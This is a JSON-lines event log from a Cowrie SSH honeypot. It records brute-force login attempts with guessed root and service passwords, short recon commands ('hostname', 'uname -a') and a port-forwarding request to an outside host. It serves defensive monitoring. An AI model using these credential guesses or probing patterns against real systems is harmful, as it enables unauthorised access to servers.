{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:38:55.956214Z","src_ip":"212.227.235.229","session":"f48ec5f68d2a"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":59664,"dst_ip":"1.2.3.4","dst_port":22,"session":"af9853225247","protocol":"ssh","message":"New connection: 41.226.27.251:59664 (1.2.3.4:22) [session: af9853225247]","sensor":"my-vps","timestamp":"2025-08-31T02:38:56.789278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:38:56.845189Z","src_ip":"41.226.27.251","session":"af9853225247"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:38:56.845926Z","src_ip":"41.226.27.251","session":"af9853225247"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"elsearch","message":"login attempt [elsearch/elsearch] failed","sensor":"my-vps","timestamp":"2025-08-31T02:38:57.020926Z","src_ip":"41.226.27.251","session":"af9853225247"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:38:58.275335Z","src_ip":"41.226.27.251","session":"af9853225247"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd","message":"login attempt [root/P@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:39:03.442713Z","src_ip":"212.227.125.160","session":"01659f9d678e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42332,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d5cf2fc56b5","protocol":"ssh","message":"New connection: 212.227.125.160:42332 (1.2.3.4:22) [session: 7d5cf2fc56b5]","sensor":"my-vps","timestamp":"2025-08-31T02:39:03.731538Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:39:03.896911Z","src_ip":"212.227.125.160","session":"7d5cf2fc56b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54170,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3664ec45181","protocol":"ssh","message":"New connection: 212.227.125.160:54170 (1.2.3.4:22) [session: b3664ec45181]","sensor":"my-vps","timestamp":"2025-08-31T02:39:08.716120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:39:09.804502Z","src_ip":"212.227.125.160","session":"b3664ec45181"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:39:09.805185Z","src_ip":"212.227.125.160","session":"b3664ec45181"}
{"eventid":"cowrie.login.success","username":"root","password":"100senha","message":"login attempt [root/100senha] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:39:16.329875Z","src_ip":"212.227.125.160","session":"b3664ec45181"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40018,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7b7c194c387","protocol":"ssh","message":"New connection: 212.227.235.229:40018 (1.2.3.4:22) [session: c7b7c194c387]","sensor":"my-vps","timestamp":"2025-08-31T02:39:17.224411Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":47018,"dst_ip":"1.2.3.4","dst_port":22,"session":"2560e3069035","protocol":"ssh","message":"New connection: 41.226.27.251:47018 (1.2.3.4:22) [session: 2560e3069035]","sensor":"my-vps","timestamp":"2025-08-31T02:39:17.273953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:39:17.288723Z","src_ip":"41.226.27.251","session":"2560e3069035"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:39:17.322436Z","src_ip":"41.226.27.251","session":"2560e3069035"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"123456","message":"login attempt [nginx/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:39:17.512787Z","src_ip":"41.226.27.251","session":"2560e3069035"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:39:18.317103Z","src_ip":"212.227.235.229","session":"c7b7c194c387"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:39:18.318156Z","src_ip":"212.227.235.229","session":"c7b7c194c387"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:39:18.760500Z","src_ip":"41.226.27.251","session":"2560e3069035"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:39:18.921214Z","src_ip":"212.227.125.160","session":"b3664ec45181"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T02:39:18.922291Z","src_ip":"212.227.125.160","session":"b3664ec45181"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:39:20.131276Z","src_ip":"212.227.125.160","session":"b3664ec45181"}
{"eventid":"cowrie.session.closed","duration":"11.4","message":"Connection lost after 11.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:39:20.132702Z","src_ip":"212.227.125.160","session":"b3664ec45181"}
{"eventid":"cowrie.login.failed","username":"es","password":"P@ssw0rd123","message":"login attempt [es/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:39:24.012717Z","src_ip":"212.227.235.229","session":"c7b7c194c387"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:39:26.118910Z","src_ip":"212.227.235.229","session":"c7b7c194c387"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":35574,"dst_ip":"1.2.3.4","dst_port":22,"session":"201d78a31e7b","protocol":"ssh","message":"New connection: 201.148.180.50:35574 (1.2.3.4:22) [session: 201d78a31e7b]","sensor":"my-vps","timestamp":"2025-08-31T02:39:27.658633Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":61832,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4d67fc2fc97","protocol":"ssh","message":"New connection: 212.227.125.160:61832 (1.2.3.4:22) [session: f4d67fc2fc97]","sensor":"my-vps","timestamp":"2025-08-31T02:39:28.199662Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-paramiko_3.5.1","message":"Remote SSH version: SSH-2.0-paramiko_3.5.1","sensor":"my-vps","timestamp":"2025-08-31T02:39:28.219245Z","src_ip":"212.227.125.160","session":"f4d67fc2fc97"}
{"eventid":"cowrie.client.kex","hassh":"a2de0f306611e0957be704f5b0e35a82","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc,aes128-gcm@openssh.com,aes256-gcm@openssh.com;hmac-sha2-256,hmac-sha2-512,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-md5,hmac-sha1-96,hmac-md5-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc","3des-cbc","aes128-gcm@openssh.com","aes256-gcm@openssh.com"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-md5","hmac-sha1-96","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a2de0f306611e0957be704f5b0e35a82","sensor":"my-vps","timestamp":"2025-08-31T02:39:28.399660Z","src_ip":"212.227.125.160","session":"f4d67fc2fc97"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:39:29.003037Z","src_ip":"201.148.180.50","session":"201d78a31e7b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:39:29.003705Z","src_ip":"201.148.180.50","session":"201d78a31e7b"}
{"eventid":"cowrie.login.success","username":"root","password":"john@123","message":"login attempt [root/john@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:39:29.130226Z","src_ip":"212.227.125.160","session":"f4d67fc2fc97"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:39:29.513813Z","src_ip":"212.227.125.160","session":"f4d67fc2fc97"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T02:39:29.514553Z","src_ip":"212.227.125.160","session":"f4d67fc2fc97"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:39:29.699805Z","src_ip":"212.227.125.160","session":"f4d67fc2fc97"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:39:29.709503Z","src_ip":"212.227.125.160","session":"f4d67fc2fc97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41880,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cafd568c7c5","protocol":"ssh","message":"New connection: 212.227.125.160:41880 (1.2.3.4:22) [session: 2cafd568c7c5]","sensor":"my-vps","timestamp":"2025-08-31T02:39:30.702191Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47618,"dst_ip":"1.2.3.4","dst_port":22,"session":"92fc272afd95","protocol":"ssh","message":"New connection: 212.227.125.160:47618 (1.2.3.4:22) [session: 92fc272afd95]","sensor":"my-vps","timestamp":"2025-08-31T02:39:30.948613Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:39:30.949779Z","src_ip":"212.227.125.160","session":"92fc272afd95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47884,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a26a9fa23e7","protocol":"ssh","message":"New connection: 212.227.125.160:47884 (1.2.3.4:22) [session: 8a26a9fa23e7]","sensor":"my-vps","timestamp":"2025-08-31T02:39:31.063389Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:39:31.064173Z","src_ip":"212.227.125.160","session":"8a26a9fa23e7"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T02:39:31.178644Z","src_ip":"212.227.125.160","session":"8a26a9fa23e7"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:39:31.522619Z","src_ip":"212.227.125.160","session":"8a26a9fa23e7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T02:39:31.638198Z","session":"8a26a9fa23e7"}
{"eventid":"cowrie.login.success","username":"root","password":"100senha","message":"login attempt [root/100senha] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:39:35.324883Z","src_ip":"201.148.180.50","session":"201d78a31e7b"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":35840,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8ec758e337b","protocol":"ssh","message":"New connection: 41.226.27.251:35840 (1.2.3.4:22) [session: f8ec758e337b]","sensor":"my-vps","timestamp":"2025-08-31T02:39:37.100135Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:39:37.165421Z","src_ip":"41.226.27.251","session":"f8ec758e337b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:39:37.166268Z","src_ip":"41.226.27.251","session":"f8ec758e337b"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher123","message":"login attempt [rancher/rancher123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:39:37.369778Z","src_ip":"41.226.27.251","session":"f8ec758e337b"}
